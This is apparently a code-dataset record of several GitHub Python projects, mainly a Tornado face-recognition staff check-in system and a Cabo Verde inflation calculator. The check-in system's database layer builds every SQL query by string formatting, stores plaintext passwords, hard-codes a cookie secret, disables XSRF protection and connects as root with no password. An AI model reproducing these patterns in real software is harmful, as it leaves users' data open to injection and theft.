single_line_chart()\r\n print(\"Line chart is saved as \" + f_basename +\"_line.png\" + \"\\n\")\r\n \r\n \r\n \r\n#mode of pairwise comparison \r\n#check if the file is missing\r\nif args.mode[0]==\"c\" and not args.file: \r\n print(\"input file missing, nothing will happen\")\r\n sys.exit()\r\n \r\nif args.mode[0]==\"c\" and len(args.file) ==1: \r\n print(\"Two files are needed, please input another file\")\r\n sys.exit()\r\n \r\nif args.mode[0]==\"c\" and args.file: #if this argument is used\r\n file = args.file[0]\r\n try: #check the existence of file\r\n open(file,\"r\")\r\n except IOError:\r\n print(\"file does not exit,please check the file name\")\r\n sys.exit() \r\n file_processing()\r\n file2 = args.file[1]\r\n try: #check the existence of file\r\n open(file2,\"r\")\r\n except IOError:\r\n print(\"file2 does not exit,please check the file name\")\r\n sys.exit() \r\n another_file_processing()\r\n if args.window and args.step:\r\n print(\"Line chart is being processed\")\r\n calculate_GC()\r\n another_GC_and_comparison_plot()\r\n print(\"Line chart is saved as \" + f_basename+\"_VS_\"+f_basename2 +\".png\" + \"\\n\")\r\n \r\n \r\n#mode of batch processing\r\n#this mode is to generate line charts of multiple files\r\nif args.mode[0]==\"b\":\r\n#retrive the path of this script\r\n#when running the script, it should be put in the same directory of the target files\r\n script_path=os.path.dirname(os.path.realpath('__file__'))\r\n target_file=[] #index of files to be processed\r\n for root,dirs,files in os.walk(script_path):\r\n for file in files:\r\n if \"py\" not in file:\r\n target_file.append(file)\r\n for file in target_file:\r\n file_processing()\r\n print(\"\\n\"+\"File is read successfully!\"+\"\\n\")\r\n if args.window and args.step:\r\n print(\"Line chart is being processed\" +\"\\n\")\r\n calculate_GC()\r\n single_line_chart()\r\n print(\"Line chart is saved as \" + f_basename +\"_line.png\" + \"\\n\")\r\n \r\n\r\n#mode of batch comparison\r\n#this mode is batch processing of pairwise comparison \r\nif args.mode[0]==\"bc\":\r\n#retrive the path of the script\r\n#when running the script, it should be put in the same directory of the target files\r\n script_path=os.path.dirname(os.path.realpath('__file__'))\r\n target_file=[] #index of files to be processed\r\n for root,dirs,files in os.walk(script_path):\r\n for file in files:\r\n if \"py\" not in file:\r\n target_file.append(file) \r\n if not args.window or not args.step:\r\n print(\"please set the window size and step\")\r\n if args.window and args.step:\r\n for i in range(0,len(target_file)):\r\n for j in range(i+1,len(target_file)):\r\n file = target_file[i]\r\n file2 = target_file[j]\r\n file_processing()\r\n another_file_processing()\r\n calculate_GC()\r\n another_GC_and_comparison_plot()\r\n print(\"Line chart is saved as \" + f_basename+\"_VS_\"+f_basename2 +\".png\" + \"\\n\")\r\n \r\n \r\n\r\n#the following part is to plot all lines in one figure \r\ndef all_in_one_plot():\r\n#this function is to draw a simple line of each file\r\n global mean_gc\r\n total_gc=0\r\n for value in gc_list:\r\n total_gc=total_gc+value\r\n mean_gc=total_gc/len(gc_list) \r\n x = middle_p\r\n y = gc_list\r\n ax.plot(x,y,label=f_basename+\":mean=\"+str(round(mean_gc,2)),linewidth=2.3)\r\n \r\nif args.mode[0]==\"a\": \r\n script_path=os.path.dirname(os.path.realpath('__file__'))\r\n target_file=[] #index of files to be processed\r\n for root,dirs,files in os.walk(script_path):\r\n for file in files:\r\n if \"py\" not in file:\r\n target_file.append(file) \r\n if not args.window or not args.step:\r\n print(\"please set the window size and step\")\r\n if args.window and args.step:\r\n fig = plt.figure(figsize=(20,10),dpi=300) #generate a blank figure , add a line every time the file is read\r\n ax = fig.add_subplot(1, 1, 1)\r\n total_mean = 0\r\n interval_assembly=[]\r\n whole_length_assembly=[]\r\n min_gc=[]\r\n max_gc=[]\r\n for file in target_file:\r\n file_processing() \r\n calculate_GC()\r\n all_in_one_plot()\r\n total_mean = total_mean + mean_gc \r\n interval_assembly.append(interval) #store important values in list\r\n whole_length_assembly.append(len(whole_seq))\r\n min_gc.append(min(gc_list)) \r\n max_gc.append(max(gc_list))\r\n total_mean = total_mean / len(target_file)\r\n #plot baseline of mean value\r\n a = [0,max(whole_length_assembly)]\r\n b = [total_mean,total_mean]\r\n ax.plot(a,b,label=\"total_mean=\"+str(round(total_mean,2)),color=\"lightcoral\",linewidth=2,linestyle=\"--\")\r\n ax.xaxis.set_major_locator(ticker.MultipleLocator(max(interval_assembly))) #the interval value is the max one\r\n ax.ticklabel_format(useOffset=False, style='plain') #not show the scientific notation\r\n plt.ylim(min(min_gc)-0.1,max(max_gc)+0.1)\r\n plt.xlabel('Position',fontsize = 20)\r\n plt.ylabel('GC content',fontsize = 20)\r\n plt.tick_params(labelsize=15)\r\n plt.legend(ncol=1,fontsize=12,loc=\"upper right\") \r\n #add the text and make its position in the middle bottom of the graph\r\n plt.text(max(whole_length_assembly)/2,min(min_gc)-0.1+0.02,s=\"window size=\"+str(window_size)+\"\\n\"+\"step=\"+str(step),horizontalalignment='center',verticalalignment='top',fontsize=12,color=\"slategrey\")\r\n plt.savefig(\"all_line.png\") \r\n print(\"Line chart is saved as all_line.png\")\r\n \r\n\r\n" } ]
2
ididy/Nevermore
https://github.com/ididy/Nevermore
9aa5daa407b2e4d58e0083a26e952561924f9fcc
99f779ec206360bb5e1c47b8d15b137524224e91
e648b3ab5102e144ed52ea3712a01e060ca3abb9
refs/heads/master
2021-01-20T23:40:24.758634
2013-03-28T18:24:56
2013-03-28T18:24:56
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5678030252456665, "alphanum_fraction": 0.5700757503509521, "avg_line_length": 34.20000076293945, "blob_id": "6e725c5837911c40b45db8bd6d455bfb465f5fe7", "content_id": "09a8f44a689ca26f3bd05269a8a67f7d1322b91e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2640, "license_type": "no_license", "max_line_length": 68, "num_lines": 75, "path": "/page_render.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import tornado.web\nfrom datetime import datetime\nimport dbhandler\nimport handler\nimport records\n\nclass MainPage(tornado.web.RequestHandler):\n def get(self):\n self.render(\"static/html/main.html\")\n\nclass ManagePage(handler.AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n sid = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n staff = db.get_staff(sid)[0]\n sname = staff['name']\n self.render(\"static/html/manage.html\", sname = sname)\n\nclass StaffInfoPage(handler.AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n sid = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n staff = db.get_staff(sid)[0]\n self.render(\"static/html/staff_info.html\", \n sid = sid, \n sname = staff['name'], \n age = staff['age'], \n idnumber = staff['idnumber'], \n department = staff['department'],\n ondutytime = staff['ondutytime'],\n offdutytime = staff['offdutytime'],\n )\n\nclass StaffRecordPage(handler.AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n sid = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n staff = db.get_staff(sid)[0]\n sname = staff['name']\n try:\n year = self.get_argument(\"year\")\n month = self.get_argument(\"month\")\n except:\n year = datetime.now().year\n month = datetime.now().month\n r = records.staff_monthly_record(sid, str(year), str(month))\n self.render(\"static/html/staff_record.html\", \n sname = sname,\n onduty = r[0],\n offduty = r[1],\n year = year,\n month = month,\n )\n\nclass AdminHomePage(handler.AuthAdminBaseHandler):\n def get(self):\n if not self.current_user:\n self.redirect(\"/login_admin\")\n return False;\n name = tornado.escape.xhtml_escape(self.current_user)\n db = dbhandler.DBHandler()\n #staff = db.get_staff(sid)[0]\n #sname = staff['name']\n self.render(\"static/html/admin_home.html\", name = name)\n\nclass AddStaffPage(handler.AuthAdminBaseHandler):\n def get(self):\n if not self.current_user:\n self.redirect(\"/login_admin\")\n return False;\n name = tornado.escape.xhtml_escape(self.current_user)\n self.render(\"static/html/add_staff.html\", name = name)\n" }, { "alpha_fraction": 0.53031325340271, "alphanum_fraction": 0.5401445627212524, "avg_line_length": 33.573333740234375, "blob_id": "ad75b3b6c2b8bf89099834bf247d98a063a8e40c", "content_id": "265ece1d5ca31b54db36aafaa8caeb5c28d037b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10375, "license_type": "no_license", "max_line_length": 168, "num_lines": 300, "path": "/handler.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "#coding=utf-8\nimport tornado.web\nimport os\nimport StringIO\nimport numpy\nimport cv2\nfrom PIL import Image\nimport base64\nfrom datetime import datetime\n\nimport face_detect\nimport face_recognise\nimport pic_pretreatment\nimport dbhandler\nimport checkin\n\nTIMEFORMAT = \"%Y-%m-%d %X\"\n\n# Manhattan Distance\ndef L1(v1,v2):\n return sum([abs(v1[i]-v2[i]) for i in range(len(v1))])\n\nclass RecogniseHandler(tornado.web.RequestHandler):\n def post(self):\n pic = self.get_argument(\"pic\")\n sid = self.get_argument(\"sid\")\n picData = base64.b64decode(pic)\n buf = StringIO.StringIO()\n buf.write(picData)\n buf.seek(0)\n # face detection\n region = face_detect.process(imgData = buf)\n # pretreatment\n if region:\n cvImage = pic_pretreatment.process(region)\n cv2Data = numpy.asarray(cvImage[:])\n # get mean and eigenvectors from DB\n db = dbhandler.DBHandler()\n try:\n mean, eigenvectors = db.get_pca()\n except:\n print \"Error: Failed to get mean and eigenvectors from DB\"\n # project\n # convert mean and eigenvectors to numpy array\n mean_list = [float(i) for i in mean.split(\" \")]\n mean_numpy = numpy.asarray(mean_list[:]).reshape(1, -1)\n\n vec_strings = [s for s in eigenvectors.split(\"|\")]\n eigenvectors_list = []\n for vec_str in vec_strings:\n vec_list = [float(i) for i in vec_str.split(\" \")]\n eigenvectors_list.append(vec_list)\n eigenvectors_numpy = numpy.asarray(eigenvectors_list[:]).reshape(len(eigenvectors_list),-1)\n\n # get eigenface\n eigenface = face_recognise.get_eigenface(mean_numpy, eigenvectors_numpy, cvData = cv2Data)\n # compute distance\n staff = db.get_staff(sid = sid)\n if len(staff) == 0:\n self.write(\"-2\") # sid is not exist\n return False\n eface_str = staff[0][\"eigenface\"]\n staff_dis = float(staff[0][\"distance\"])\n eface = [float(i) for i in eface_str.split(\" \")]\n dis = L1(eigenface[0], eface)\n '''\n print eigenface[0]\n print eface\n print dis\n '''\n if dis <= staff_dis:\n image_path = \"static/records/checkin/%s_%s.jpg\" % (sid, datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\"))\n buf.seek(0)\n image = Image.open(buf)\n image.save(image_path, \"JPEG\", quality = 80)\n msg = checkin.checkin(sid, image_path)\n if msg[1] == -1 or msg[1] == 0:\n os.remove(image_path) # check in error\n reponse_msg = str(msg[1]) + '|' + msg[0]\n self.write(reponse_msg)\n print msg[0]\n else:\n self.write(\"-1\")\n else:\n self.write(\"-1\")\n\n\nclass UploadIMGHandler(tornado.web.RequestHandler):\n def post(self):\n # get picture and sid\n pic = self.get_argument(\"pic\")\n sid = self.get_argument(\"sid\")\n\n picData = base64.b64decode(pic)\n buf = StringIO.StringIO()\n buf.write(picData)\n buf.seek(0)\n face_tmp_path = \"static/records/faces/%s_tmp.jpg\" % sid\n grayface_tmp_path = \"static/records/grayfaces/%s_tmp.jpg\" % sid\n\n # face detection\n region = face_detect.process(imgData = buf, outfile = face_tmp_path)\n # pretreatment\n if region:\n pic_pretreatment.process(region, \n powfile = grayface_tmp_path,\n )\n self.write(\"success\")\n else:\n self.write(\"failed\")\n\nclass AddStaffHandler(tornado.web.RequestHandler):\n def post(self):\n # get info\n sid = self.get_argument(\"sid\")\n pwd = self.get_argument(\"pwd\")\n name = self.get_argument(\"name\")\n idnumber = self.get_argument(\"idnumber\")\n age = int(self.get_argument(\"age\"))\n department = int(self.get_argument(\"department\"))\n ondutytime = self.get_argument(\"ondutytime\")\n offdutytime = self.get_argument(\"offdutytime\")\n \n grayface_tmp_path = \"static/records/grayfaces/%s_tmp.jpg\" % sid\n db = dbhandler.DBHandler()\n\n # write staff information to DB\n try:\n db.add_staff(sid = sid, pwd = pwd, name = name, idnumber = idnumber, age = age, department = department, ondutytime = ondutytime, offdutytime = offdutytime)\n except:\n print \"Error: Add staff information failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n\n # store new face picture to DB\n grayface = cv2.imread(grayface_tmp_path, 0)\n grayface = grayface.reshape(100 * 100)\n grayface_str = \"\"\n for p in grayface:\n grayface_str += str(p)\n grayface_str += \" \"\n grayface_str = grayface_str[:-1]\n try:\n db.store_face(sid, grayface_str)\n except:\n print \"Error: Store image to DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n\n # Compute PCA - Training\n mean, eigenvectors = face_recognise.computePCA()\n\n # Update all staffs' eigenface\n staffs = db.look_table(\"staff\")\n efaces = {}\n for staff in staffs:\n sid = staff[\"sid\"]\n try:\n records = db.get_face(sid)\n except:\n print \"Error: Get image from DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n nm = numpy.fromstring(records[0]['img'], dtype = numpy.uint8, sep = \" \")\n nm = nm.reshape(100, -1)\n eigenface = face_recognise.get_eigenface(mean, eigenvectors, cvData = nm)\n l = [\"%.8f\" % number for number in eigenface[0]]\n eigenface_str = \" \".join(l)\n try:\n db.update_eigenface(sid, eigenface_str)\n except:\n print \"Error: Write eigenface to DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n efaces[sid] = eigenface\n\n # Update all staffs' distance\n ratio = 2.0\n for sid in efaces:\n theface = efaces[sid]\n min = 10000000.0\n for other in efaces:\n if other != sid:\n dis = L1(theface[0], efaces[other][0])\n if dis < min:\n min = dis\n try:\n db.update_distance(sid, min / ratio)\n except:\n print \"Error: Write distance to DB failed. sid = %s\" % sid\n self.write(\"failed\")\n return False\n\n # Write mean and eigenvectors to DB\n # mean to string\n m = [\"%.8f\" % number for number in mean[0]]\n mean_str = \" \".join(m)\n # eigenvectors to string\n eigenvectors_str = \"\"\n for vec in eigenvectors:\n v = [\"%.8f\" % number for number in vec]\n vec_str = \" \".join(v)\n eigenvectors_str += vec_str\n eigenvectors_str += \"|\"\n eigenvectors_str = eigenvectors_str[:-1]\n try:\n db.update_pca(mean_str, eigenvectors_str)\n except:\n print \"Error: Update mean and eigenvectors to DB failed. \"\n self.write(\"failed\")\n return False\n\n os.remove(grayface_tmp_path)\n self.write(\"success\")\n\n# staff manage\nclass AuthBaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"sid\")\n\nclass LoginHandler(AuthBaseHandler):\n def get(self):\n self.render(\"static/html/login.html\")\n\n def post(self):\n db = dbhandler.DBHandler()\n sid = self.get_argument(\"sid\")\n pwd = self.get_argument(\"pwd\")\n check = db.staff_login(sid, pwd)\n if check == 1:\n self.set_secure_cookie(\"sid\", sid)\n self.write(\"success\")\n elif check == -1:\n self.write(\"siderror\")\n elif check == 0:\n self.write(\"pwderror\")\n\nclass LogoutHandler(AuthBaseHandler):\n @tornado.web.authenticated\n def get(self):\n self.clear_cookie(\"sid\")\n self.redirect(\"/login\")\n\nclass RecordInfoHandler(AuthBaseHandler):\n @tornado.web.authenticated\n def post(self):\n db = dbhandler.DBHandler()\n sid = tornado.escape.xhtml_escape(self.current_user)\n year = self.get_argument(\"year\")\n month = self.get_argument(\"month\")\n day = self.get_argument(\"day\")\n rtype = self.get_argument(\"type\")\n time1 = \"%s-%s-%d 00:00:00\" % (year, month, int(day))\n time2 = \"%s-%s-%d 23:59:59\" % (year, month, int(day))\n records = db.get_checkin_records(sid, time1, time2)\n for r in records:\n if r['rtype'] == int(rtype):\n self.write(str(r['rtime']))\n\n# admin manage\nclass AuthAdminBaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"name\")\n\nclass LoginAdminHandler(AuthAdminBaseHandler):\n def get(self):\n self.render(\"static/html/login_admin.html\")\n\n def post(self):\n db = dbhandler.DBHandler()\n name = self.get_argument(\"name\")\n pwd = self.get_argument(\"pwd\")\n check = db.admin_login(name, pwd)\n if check == 1:\n self.set_secure_cookie(\"name\", name)\n self.write(\"success\")\n elif check == -1:\n self.write(\"aiderror\")\n elif check == 0:\n self.write(\"pwderror\")\n\nclass LogoutAdminHandler(AuthAdminBaseHandler):\n def get(self):\n if self.current_user:\n name = tornado.escape.xhtml_escape(self.current_user)\n self.clear_cookie(\"name\")\n self.redirect(\"/login_admin\")\n\nclass CheckSIDHandler(AuthAdminBaseHandler):\n def post(self):\n if self.current_user:\n db = dbhandler.DBHandler()\n sid = self.get_argument(\"sid\")\n records = db.get_staff(sid)\n if len(records) == 0:\n self.write(\"nosid\")\n else:\n self.write(\"hadsid\")\n else:\n self.redirect(\"/login_admin\")\n\n\n\n" }, { "alpha_fraction": 0.5105708241462708, "alphanum_fraction": 0.5295982956886292, "avg_line_length": 24.567567825317383, "blob_id": "84be5fdc42bc044da66a87386c3bbae9221f4524", "content_id": "12daa7b9348d82fde6b59dacdd13dbacdc102120", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 946, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/tools/update_dis.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import numpy\nimport sys\nsys.path.append('..')\n\nimport dbhandler\nimport face_recognise\n\nratio = 2.0\n\n# Manhattan Distance\ndef L1(v1,v2):\n return sum([abs(v1[i]-v2[i]) for i in range(len(v1))])\n\nif __name__ == \"__main__\":\n db = dbhandler.DBHandler()\n staffs = db.look_table(\"staff\")\n efaces = {}\n for staff in staffs:\n sid = staff[\"sid\"]\n eface_str = staff[\"eigenface\"]\n eigenface = [float(i) for i in eface_str.split(\" \")] \n efaces[sid] = eigenface\n\n # Update all staffs' distance\n for sid in efaces:\n theface = efaces[sid]\n min = 10000000.0\n for other in efaces:\n if other != sid:\n dis = L1(theface, efaces[other])\n if dis < min:\n min = dis\n try:\n db.update_distance(sid, min / ratio)\n except:\n print \"Error: Write distance to DB failed. sid = %s\" % sid\n exit()\n" }, { "alpha_fraction": 0.5665627717971802, "alphanum_fraction": 0.5794746279716492, "avg_line_length": 40.592594146728516, "blob_id": "4d212ae196fb9f18df5aea975b37615c26818b57", "content_id": "b69d9e287223e1c80226d7f5ff13e7ce8b74e00b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4492, "license_type": "no_license", "max_line_length": 288, "num_lines": 108, "path": "/dbhandler.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import tornado.database\n\nDEFAULT_ON_DUTY_TIME = \"8:30\"\nDEFAULT_OFF_DUTY_TIME = \"17:30\"\n\n# Fix time_zone problem\nclass Connection(tornado.database.Connection):\n def __init__(self, mysql_host, mysql_database, mysql_user, mysql_password):\n super(Connection, self).__init__(\n host=mysql_host,\n database=mysql_database,\n user=mysql_user,\n password=mysql_password\n )\n self._db_args[\"init_command\"] = 'SET time_zone = \"+8:00\"'\n try:\n self.reconnect()\n except Exception:\n logging.error(\"Cannot connect to MySQL on %s\", self.host,\n exc_info=True)\n\nclass DBHandler:\n # Init the connection\n def __init__(self):\n self.db = Connection(\"localhost\", \"nevermore\", \"root\", \"\")\n \n # Login check \n def staff_login(self, sid, pwd):\n if self.db.execute_rowcount(\"SELECT * FROM staff WHERE sid = '%s'\" % (sid)) == 0:\n return -1\n if self.db.execute_rowcount(\"SELECT * FROM staff WHERE sid = '%s' and pwd = '%s'\" % (sid, pwd)) == 1:\n return 1\n else:\n return 0\n\n # Admin Login check \n def admin_login(self, name, pwd):\n if self.db.execute_rowcount(\"SELECT * FROM admin WHERE name = '%s'\" % (name)) == 0:\n return -1\n if self.db.execute_rowcount(\"SELECT * FROM admin WHERE name = '%s' and pwd = '%s'\" % (name, pwd)) == 1:\n return 1\n else:\n return 0\n \n # Look up the table\n def look_table(self, table):\n return self.db.query(\"SELECT * FROM %s\" % table)\n \n # Add one staff in db\n def add_staff(self, sid, pwd, name, idnumber, age, department,\n ondutytime = DEFAULT_ON_DUTY_TIME, \n offdutytime = DEFAULT_OFF_DUTY_TIME, \n distance = 0.0, \n eigenface = \" \",\n ):\n self.db.execute(\"INSERT INTO staff (sid, pwd, name, idnumber, age, department, ondutytime, offdutytime, distance, eigenface) VALUES ('%s', '%s', '%s', '%s', %d, %d, '%s', '%s', %f, '%s')\" % (sid, pwd, name, idnumber, age, department, ondutytime, offdutytime, distance, eigenface))\n\n #Get one staff's info\n def get_staff(self, sid):\n return self.db.query(\"SELECT * FROM staff WHERE sid = '%s'\" % (sid))\n\n #Update one staff's eigenface in db\n def update_eigenface(self, sid, eigenface):\n self.db.execute(\"UPDATE staff SET eigenface = '%s' WHERE sid = '%s'\" % (eigenface, sid))\n\n #Update one staff's distance in db\n def update_distance(self, sid, distance):\n self.db.execute(\"UPDATE staff SET distance = %f WHERE sid = '%s'\" % (distance, sid))\n\n #Delete one staff in db\n def del_staff(self, sid):\n self.db.execute(\"DELETE FROM staff WHERE sid = '%s'\" % sid)\n \n #Add one log in db\n def add_log(self, uid, ltype, content):\n self.db.execute(\"INSERT INTO log (uid, ltype, content) VALUES ('%s', %d, '%s',)\" % (uid, ltype, content))\n\n #Update mean and eigenvectors\n def update_pca(self, mean, eigenvectors):\n self.db.execute(\"UPDATE setting SET value = '%s' WHERE skey = 'mean'\" % (mean))\n self.db.execute(\"UPDATE setting SET value = '%s' WHERE skey = 'eigenvectors'\" % (eigenvectors))\n\n # Get mean and eigenvectors\n def get_pca(self):\n mean = self.db.query(\"SELECT value FROM setting WHERE skey = 'mean'\")\n eigenvectors = self.db.query(\"SELECT value FROM setting WHERE skey = 'eigenvectors'\")\n return (mean[0]['value'], eigenvectors[0]['value'])\n\n # Store face image to DB\n def store_face(self, sid, img_string):\n self.db.execute(\"INSERT INTO image (sid, img) VALUES ('%s', '%s')\" % (sid, img_string))\n\n # Get face image by sid\n def get_face(self, sid):\n return self.db.query(\"SELECT * FROM image WHERE sid = '%s'\" % (sid))\n\n # Get checkin records for a period time\n def get_checkin_records(self, sid, time1, time2):\n return self.db.query(\"SELECT * FROM record WHERE sid = '%s' and rtime >= '%s' and rtime <= '%s'\" % (sid, time1, time2))\n\n # Add checkin record in db\n def add_checkin_record(self, sid, rtype, rstate, rimage):\n self.db.execute(\"INSERT INTO record (sid, rtype, rstate, rimage) VALUES ('%s', %d, %d, '%s')\" % (sid, rtype, rstate, rimage))\n\nif __name__ == '__main__':\n db = DBHandler()\n for r in db.get_checkin_records('224', '2013-03-26 00:00:00', '2013-3-30 23:59:59'):\n print r['rtime']\n" }, { "alpha_fraction": 0.6631234884262085, "alphanum_fraction": 0.6663941144943237, "avg_line_length": 28.119047164916992, "blob_id": "1158d9e8315f4edf425044ada1cd2653a4d5d4c5", "content_id": "b556da825c43743ca8bb76dbee39ac4fba21611f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1223, "license_type": "no_license", "max_line_length": 92, "num_lines": 42, "path": "/main.py", "repo_name": "ididy/Nevermore", "src_encoding": "UTF-8", "text": "import tornado.ioloop\nimport tornado.web\nimport os\nimport handler\nimport page_render\n\nsettings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"cookie_secret\": \"61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",\n \"login_url\": \"/login\",\n \"xsrf_cookies\": False,\n}\n\napplication = tornado.web.Application([\n (r\"/\", page_render.MainPage),\n\n (r\"/manage\", page_render.ManagePage),\n (r\"/staff_info\", page_render.StaffInfoPage),\n (r\"/staff_record\", page_render.StaffRecordPage),\n\n (r\"/admin_home\", page_render.AdminHomePage),\n (r\"/add_staff\", page_render.AddStaffPage),\n\n (r\"/login\", handler.LoginHandler),\n (r\"/login_admin\", handler.LoginAdminHandler),\n (r\"/logout\", handler.LogoutHandler),\n (r\"/logout_admin\", handler.LogoutAdminHandler),\n\n (r\"/recognise\", handler.RecogniseHandler),\n\n (r\"/add_new_staff\", handler.AddStaffHandler),\n (r\"/upload_image\", handler.UploadIMGHandler),\n (r\"/checksid\", handler.CheckSIDHandler),\n\n (r\"/record_info\", handler.RecordInfoHandler),\n\n (r\"/(favicon\\.ico)\", tornado.web.StaticFileHandler, dict(path=settings['static_path'])),\n], debug = True, **settings)\n\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()\n" } ]
5
sergioalves20/TAI
https://github.com/sergioalves20/TAI
e679a7cc9b91f1ef29b19785aae63e3414cca9d6
5d0120b7256a45490cb979acf3dd652c4b58a948
4079dd040add7ec972965cec002e753493440c08
refs/heads/main
2023-09-04T02:55:59.601324
2021-10-12T19:09:25
2021-10-12T19:09:25
415,148,539
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7475247383117676, "alphanum_fraction": 0.7475247383117676, "avg_line_length": 56.57143020629883, "blob_id": "ccf69de73db9c7ceac543e82a4aca382ed4ad340", "content_id": "5c41be58d3db8038982fe99b285f1595e7d63fbe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 414, "license_type": "permissive", "max_line_length": 102, "num_lines": 7, "path": "/README.md", "repo_name": "sergioalves20/TAI", "src_encoding": "UTF-8", "text": "# TAI\n <p>Taxa Anual de Inflação</p>\n <p>Meu projeto como iniciante em Python</p>\n <p>Dados recolhidos na página oficial do Instituto Nacional de Estatística de Cabo Verde</p>\n <p>Serve para atualizar um valor (por ex. preço de um produto) acrescentando a Taxa Anual de Inflação\n a partir do ano da sua aquisição</p>\n <p>Este pequeno programa pode dar uma otima ajuda quando se faz um orçamento.</p>\n\n" }, { "alpha_fraction": 0.5663716793060303, "alphanum_fraction": 0.6460176706314087, "avg_line_length": 30.38888931274414, "blob_id": "045e42e352ea62518a9d4ed5408f40e6a946bc88", "content_id": "04310e47ba59a88c598f77ab961501c22b54d449", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 570, "license_type": "permissive", "max_line_length": 92, "num_lines": 18, "path": "/inecv/main.py", "repo_name": "sergioalves20/TAI", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nfrom uteis import uteis\n\n\nuteis.titulo (2, 'CÁLCULO DO VALOR ACRESCIDO DA TAXA ANUAL DE INFLAÇÃO')\nprint ('\\033[33mDADOS DISPONÍVEIS\\033[m: ENTRE O ANO 1990 E 2020')\nprint ('\\033[33mFONTE\\033[m: Instituto Nacional de Estatística de Cabo Verde (INEcv)\\033[m')\nprint ('')\n\nwhile True:\n print (uteis.dados ())\n resp = ' '\n while resp not in 'SN':\n resp = str (input ('\\033[31mDeseja continuar? [s/n]\\033[m')).strip ().upper ()[0]\n if resp == 'N':\n print ('\\033[35mFIM DA CONSULTA!\\033[m')\n break\n" }, { "alpha_fraction": 0.5142095685005188, "alphanum_fraction": 0.5559502840042114, "avg_line_length": 24.88505744934082, "blob_id": "5a2d3736f2fe900316ad8326c640822391bec10b", "content_id": "7fb1201dffcb59f8bc078edbfadf0a4aba9e58d9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2261, "license_type": "permissive", "max_line_length": 94, "num_lines": 87, "path": "/inecv/uteis/uteis.py", "repo_name": "sergioalves20/TAI", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\n\n\ndef leiaint(msg):\n while True:\n try:\n ano = int (input (msg))\n except(ValueError, TypeError):\n print ('ERRO: digite um numero inteiro válido')\n continue\n except KeyboardInterrupt:\n print ('\\nInterrompido.')\n return 0\n else:\n return ano\n\n\ndef leiafloat(msg):\n while True:\n try:\n preco = float (input (msg))\n except(ValueError, TypeError):\n print ('ERRO: digite um numero inteiro ou decimal')\n continue\n except KeyboardInterrupt:\n print ('\\nInterrompido.')\n return 0\n else:\n return preco\n\n\nc = ('\\033[m', # 0 - Sem cor\n '\\033[30m', # 1 - Branco\n '\\033[31m', # 2 - Vermelho\n '\\033[32m', # 3 - Verde\n '\\033[33m', # 4 - Amarelo\n '\\033[34m', # 5 - Azul\n '\\033[35m', # 6 - Roxo\n '\\033[36m', # 7 - Magenta\n '\\033[37m') # 8 - Cinza\n\n\ndef linha(tam=0, cor=0):\n print (c[cor], '-' * tam)\n\n\ndef titulo(cor=0, msg=''):\n tam = len (msg)\n linha (tam, 5)\n print (c[cor], msg)\n linha (tam, 5, )\n print ('\\033[m')\n\n\ndef dados():\n # Importa o excel com o ano e a taxa de inflação anual\n df = pd.read_excel ('inecv/taxacv.xlsx', engine='openpyxl')\n\n # Altera o nome das 2 colunas\n df.rename (columns={'ano': 'Ano', 'taxa': 'Taxa'}, inplace=True)\n\n # Calcula e cria uma coluna 'Fator Conv.' (Fator de Conversão)\n df['Fator Conv.'] = 1 + df['Taxa'] / 100\n\n df = df.set_index ('Ano')\n\n df = df.loc[leiaint ('\\033[036mDigite o ano de referência do preço [1990/2020]:\\033[m '):]\n\n # Regista numa variável o valor a calcular e valida a operação\n preco = leiafloat ('\\033[036mDigite o valor inteiro ou decimal a calcular:\\033[m ')\n print ('')\n\n # Cria uma coluna 'Novo Valor' com valores nulos\n df['Novo Valor'] = np.nan\n\n # Anexa o Valor solicitado\n df['Novo Valor'] = preco\n\n pd.set_option ('display.precision', 2)\n # Calcula e anexa o Novo Valor\n df['Novo Valor'] = df['Novo Valor'] * df['Fator Conv.'].cumprod ()\n\n # Substitui os valores nulos pelo Novo Valor\n df['Novo Valor'] = df['Novo Valor'].ffill ()\n\n return df\n" } ]
3
eric-seekas/sentence_similarity
https://github.com/eric-seekas/sentence_similarity
456e29ecb53e63a6f0ab804acfc6e919e1a1458c
647e90b1c43ab838fe857f87d3a2d5364112ff9b
d5905c424264e9376fb80871749865140fbd3fb1
refs/heads/master
2021-02-08T18:20:45.443720
2018-05-22T10:50:17
